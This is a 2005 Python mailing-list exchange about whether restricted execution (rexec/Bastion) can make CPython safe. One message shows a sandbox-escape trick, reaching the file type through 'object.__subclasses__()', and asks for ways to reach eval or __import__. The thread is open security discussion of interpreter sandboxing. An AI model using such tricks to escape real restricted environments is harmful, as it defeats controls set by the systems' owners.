On Wed, Jan 26, 2005 at 10:23:03AM -0700, Steven Bethard wrote:
Jack Diederich wrote:
Yes, this comes up every couple months and there is only one answer:
This is the job of the OS.
Java largely succeeds at doing sandboxy things because it was written that way from the ground up (to behave both like a program interpreter and an OS).
Python the language was not, and the CPython interpreter definitely was not.
Search groups.google.com for previous discussions of this on c.l.py
Could you give some useful queries? Every time I do this search, I get a few results, but never anything that really goes into the security holes in any depth. (They're ususally something like -- "look, given object, I can get int" not "look, given object, I can get eval, __import__, etc.)
A search on "rexec bastion" will give you most of the threads, search on "rexec bastion diederich" to see the other times I tried to
stop the threads by reccomending reading the older ones *wink*.
Thread subjects: Replacement for rexec/Bastion? Creating a capabilities-based restricted execution system Embedding Python in Python killing thread ?
Thanks for the keywords -- I hadn't tried anything like any of these. Unfortunately, they leave me with the same feeling as before... The closest example that I saw that actually showed a security hole made use of __builtins__. As you'll note from the beginning of this thread, I was considering the case where no builtins are provided and imports are disabled.
I also read a number of messages that had the same problems I do -- too many threads just say "look at google groups", without saying what to search for. They also often spend most of their time talking about abstract problems, without showing code that illustrates how to break the "security". For example, I never found anything close to describing how to retrieve, say, 'eval' or '__import__' given only 'object'.
What would be really nice is a wiki that had examples of how to derive "unsafe" functions from 'object'. I'd be glad to put one together, but so far, I can't find many examples... If you want to consider reading and writing of files as "unsafe", then I guess this might be one:
file = object.__subclasses__()[16]
If I could see how to go from 'object' (or 'int', 'str', 'file', etc.) to 'eval' or '__import__', that would help out a lot...
Steve -- http://mail.python.org/mailman/listinfo/python-list
